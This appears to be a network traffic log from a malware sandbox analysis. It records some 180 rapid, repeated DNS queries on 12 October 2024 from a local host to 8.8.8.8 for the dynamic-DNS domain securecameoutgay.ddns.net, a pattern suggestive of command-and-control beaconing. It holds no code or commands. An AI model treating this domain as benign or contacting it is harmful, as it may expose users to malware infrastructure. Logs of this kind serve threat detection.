                                                    Oct 12, 2024 23:05:27.542792082 CEST192.168.2.148.8.8.80xda6aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.549371004 CEST192.168.2.148.8.8.80xda6aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.556518078 CEST192.168.2.148.8.8.80x9f8cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.563201904 CEST192.168.2.148.8.8.80x9f8cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.570162058 CEST192.168.2.148.8.8.80x9f8cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.576822996 CEST192.168.2.148.8.8.80x9f8cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.583772898 CEST192.168.2.148.8.8.80x9f8cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.591710091 CEST192.168.2.148.8.8.80x6260Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.598599911 CEST192.168.2.148.8.8.80x6260Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.605205059 CEST192.168.2.148.8.8.80x6260Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.611728907 CEST192.168.2.148.8.8.80x6260Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.618365049 CEST192.168.2.148.8.8.80x6260Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.624887943 CEST192.168.2.148.8.8.80xf628Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.631494045 CEST192.168.2.148.8.8.80xf628Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.638067961 CEST192.168.2.148.8.8.80xf628Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.644520044 CEST192.168.2.148.8.8.80xf628Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.651633024 CEST192.168.2.148.8.8.80xf628Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.658463001 CEST192.168.2.148.8.8.80x879bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.665303946 CEST192.168.2.148.8.8.80x879bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.672216892 CEST192.168.2.148.8.8.80x879bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.681339025 CEST192.168.2.148.8.8.80x879bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.687890053 CEST192.168.2.148.8.8.80x879bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.694744110 CEST192.168.2.148.8.8.80x1e9bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.701162100 CEST192.168.2.148.8.8.80x1e9bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.707873106 CEST192.168.2.148.8.8.80x1e9bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.714987993 CEST192.168.2.148.8.8.80x1e9bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.721785069 CEST192.168.2.148.8.8.80x1e9bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.729141951 CEST192.168.2.148.8.8.80x9aa9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.736012936 CEST192.168.2.148.8.8.80x9aa9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.742892981 CEST192.168.2.148.8.8.80x9aa9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.749783993 CEST192.168.2.148.8.8.80x9aa9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.756777048 CEST192.168.2.148.8.8.80x9aa9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.763586998 CEST192.168.2.148.8.8.80xe5bdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.770265102 CEST192.168.2.148.8.8.80xe5bdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.777692080 CEST192.168.2.148.8.8.80xe5bdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.784835100 CEST192.168.2.148.8.8.80xe5bdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.791779995 CEST192.168.2.148.8.8.80xe5bdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.798353910 CEST192.168.2.148.8.8.80x7934Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.805354118 CEST192.168.2.148.8.8.80x7934Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.812063932 CEST192.168.2.148.8.8.80x7934Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.818495989 CEST192.168.2.148.8.8.80x7934Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.825433969 CEST192.168.2.148.8.8.80x7934Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.832616091 CEST192.168.2.148.8.8.80x199bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.839402914 CEST192.168.2.148.8.8.80x199bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.845926046 CEST192.168.2.148.8.8.80x199bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.852962017 CEST192.168.2.148.8.8.80x199bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.859420061 CEST192.168.2.148.8.8.80x199bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.866036892 CEST192.168.2.148.8.8.80x220Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.872756004 CEST192.168.2.148.8.8.80x220Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.879812002 CEST192.168.2.148.8.8.80x220Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.885935068 CEST192.168.2.148.8.8.80x220Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.892606974 CEST192.168.2.148.8.8.80x220Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.899359941 CEST192.168.2.148.8.8.80x2e1dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.906060934 CEST192.168.2.148.8.8.80x2e1dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.912856102 CEST192.168.2.148.8.8.80x2e1dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.919382095 CEST192.168.2.148.8.8.80x2e1dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.926042080 CEST192.168.2.148.8.8.80x2e1dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.932919025 CEST192.168.2.148.8.8.80xc99bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.939554930 CEST192.168.2.148.8.8.80xc99bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.945995092 CEST192.168.2.148.8.8.80xc99bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.952745914 CEST192.168.2.148.8.8.80xc99bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.959491968 CEST192.168.2.148.8.8.80xc99bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.966039896 CEST192.168.2.148.8.8.80xa5d9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.973906040 CEST192.168.2.148.8.8.80xa5d9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.982193947 CEST192.168.2.148.8.8.80xa5d9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.989134073 CEST192.168.2.148.8.8.80xa5d9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:27.995676994 CEST192.168.2.148.8.8.80xa5d9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.002675056 CEST192.168.2.148.8.8.80x2b43Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.009491920 CEST192.168.2.148.8.8.80x2b43Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.016022921 CEST192.168.2.148.8.8.80x2b43Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.022749901 CEST192.168.2.148.8.8.80x2b43Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.029306889 CEST192.168.2.148.8.8.80x2b43Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.035729885 CEST192.168.2.148.8.8.80x79e4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.042821884 CEST192.168.2.148.8.8.80x79e4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.049401999 CEST192.168.2.148.8.8.80x79e4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.055948973 CEST192.168.2.148.8.8.80x79e4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.062205076 CEST192.168.2.148.8.8.80x79e4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.069658041 CEST192.168.2.148.8.8.80x4abdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.076394081 CEST192.168.2.148.8.8.80x4abdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.082792997 CEST192.168.2.148.8.8.80x4abdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.089433908 CEST192.168.2.148.8.8.80x4abdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.096024036 CEST192.168.2.148.8.8.80x4abdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.102521896 CEST192.168.2.148.8.8.80xc88bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.108683109 CEST192.168.2.148.8.8.80xc88bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.114968061 CEST192.168.2.148.8.8.80xc88bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.121449947 CEST192.168.2.148.8.8.80xc88bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.127856970 CEST192.168.2.148.8.8.80xc88bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.135565042 CEST192.168.2.148.8.8.80xf8e7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.142479897 CEST192.168.2.148.8.8.80xf8e7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.148888111 CEST192.168.2.148.8.8.80xf8e7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.155778885 CEST192.168.2.148.8.8.80xf8e7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.162308931 CEST192.168.2.148.8.8.80xf8e7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.169171095 CEST192.168.2.148.8.8.80x2992Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.175800085 CEST192.168.2.148.8.8.80x2992Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.182782888 CEST192.168.2.148.8.8.80x2992Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.189990997 CEST192.168.2.148.8.8.80x2992Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.196842909 CEST192.168.2.148.8.8.80x2992Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.203691959 CEST192.168.2.148.8.8.80xfad3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.210237980 CEST192.168.2.148.8.8.80xfad3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.216895103 CEST192.168.2.148.8.8.80xfad3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.223537922 CEST192.168.2.148.8.8.80xfad3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.230087042 CEST192.168.2.148.8.8.80xfad3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.237600088 CEST192.168.2.148.8.8.80xc0d6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.245419025 CEST192.168.2.148.8.8.80xc0d6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.253004074 CEST192.168.2.148.8.8.80xc0d6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.260962009 CEST192.168.2.148.8.8.80xc0d6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.267307997 CEST192.168.2.148.8.8.80xc0d6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.273880005 CEST192.168.2.148.8.8.80x63e9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.280462027 CEST192.168.2.148.8.8.80x63e9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.286880016 CEST192.168.2.148.8.8.80x63e9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.294676065 CEST192.168.2.148.8.8.80x63e9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.301443100 CEST192.168.2.148.8.8.80x63e9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.310190916 CEST192.168.2.148.8.8.80xc52cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.317378998 CEST192.168.2.148.8.8.80xc52cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.323957920 CEST192.168.2.148.8.8.80xc52cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.330729961 CEST192.168.2.148.8.8.80xc52cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.337342978 CEST192.168.2.148.8.8.80xc52cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.344324112 CEST192.168.2.148.8.8.80x35b7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.351202011 CEST192.168.2.148.8.8.80x35b7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.358531952 CEST192.168.2.148.8.8.80x35b7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.365475893 CEST192.168.2.148.8.8.80x35b7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.372241020 CEST192.168.2.148.8.8.80x35b7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.378741980 CEST192.168.2.148.8.8.80xe3ceStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.385251999 CEST192.168.2.148.8.8.80xe3ceStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.391479015 CEST192.168.2.148.8.8.80xe3ceStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.399028063 CEST192.168.2.148.8.8.80xe3ceStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.405975103 CEST192.168.2.148.8.8.80xe3ceStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.414114952 CEST192.168.2.148.8.8.80x5c7bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.420885086 CEST192.168.2.148.8.8.80x5c7bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.429197073 CEST192.168.2.148.8.8.80x5c7bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.436052084 CEST192.168.2.148.8.8.80x5c7bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.444269896 CEST192.168.2.148.8.8.80x5c7bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.450597048 CEST192.168.2.148.8.8.80x6989Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.457242012 CEST192.168.2.148.8.8.80x6989Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.463494062 CEST192.168.2.148.8.8.80x6989Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.470506907 CEST192.168.2.148.8.8.80x6989Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.477123022 CEST192.168.2.148.8.8.80x6989Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.483875036 CEST192.168.2.148.8.8.80xb3c6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.490706921 CEST192.168.2.148.8.8.80xb3c6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.497035980 CEST192.168.2.148.8.8.80xb3c6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.503526926 CEST192.168.2.148.8.8.80xb3c6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.509903908 CEST192.168.2.148.8.8.80xb3c6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.516391039 CEST192.168.2.148.8.8.80xb11bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.523263931 CEST192.168.2.148.8.8.80xb11bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.529946089 CEST192.168.2.148.8.8.80xb11bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.538536072 CEST192.168.2.148.8.8.80xb11bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.545186996 CEST192.168.2.148.8.8.80xb11bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.552016020 CEST192.168.2.148.8.8.80x1904Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.558963060 CEST192.168.2.148.8.8.80x1904Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.565903902 CEST192.168.2.148.8.8.80x1904Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.573024988 CEST192.168.2.148.8.8.80x1904Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.579682112 CEST192.168.2.148.8.8.80x1904Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.586705923 CEST192.168.2.148.8.8.80xb148Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.593300104 CEST192.168.2.148.8.8.80xb148Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.600035906 CEST192.168.2.148.8.8.80xb148Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.607043028 CEST192.168.2.148.8.8.80xb148Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.613847017 CEST192.168.2.148.8.8.80xb148Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.620778084 CEST192.168.2.148.8.8.80x928aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.628161907 CEST192.168.2.148.8.8.80x928aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.635720968 CEST192.168.2.148.8.8.80x928aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.642564058 CEST192.168.2.148.8.8.80x928aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.649218082 CEST192.168.2.148.8.8.80x928aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.656008005 CEST192.168.2.148.8.8.80xfe01Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.662631035 CEST192.168.2.148.8.8.80xfe01Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.669981003 CEST192.168.2.148.8.8.80xfe01Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.676511049 CEST192.168.2.148.8.8.80xfe01Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.683329105 CEST192.168.2.148.8.8.80xfe01Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.690910101 CEST192.168.2.148.8.8.80x6251Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.697837114 CEST192.168.2.148.8.8.80x6251Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.704668045 CEST192.168.2.148.8.8.80x6251Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.711435080 CEST192.168.2.148.8.8.80x6251Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.718674898 CEST192.168.2.148.8.8.80x6251Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.725347996 CEST192.168.2.148.8.8.80x408cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.732214928 CEST192.168.2.148.8.8.80x408cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.738950014 CEST192.168.2.148.8.8.80x408cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.745743036 CEST192.168.2.148.8.8.80x408cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.752600908 CEST192.168.2.148.8.8.80x408cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.759057999 CEST192.168.2.148.8.8.80xee4dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.765559912 CEST192.168.2.148.8.8.80xee4dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.772408009 CEST192.168.2.148.8.8.80xee4dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.779668093 CEST192.168.2.148.8.8.80xee4dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.786662102 CEST192.168.2.148.8.8.80xee4dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.794521093 CEST192.168.2.148.8.8.80x880dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.802042961 CEST192.168.2.148.8.8.80x880dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.808444977 CEST192.168.2.148.8.8.80x880dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.815351009 CEST192.168.2.148.8.8.80x880dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.822062016 CEST192.168.2.148.8.8.80x880dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
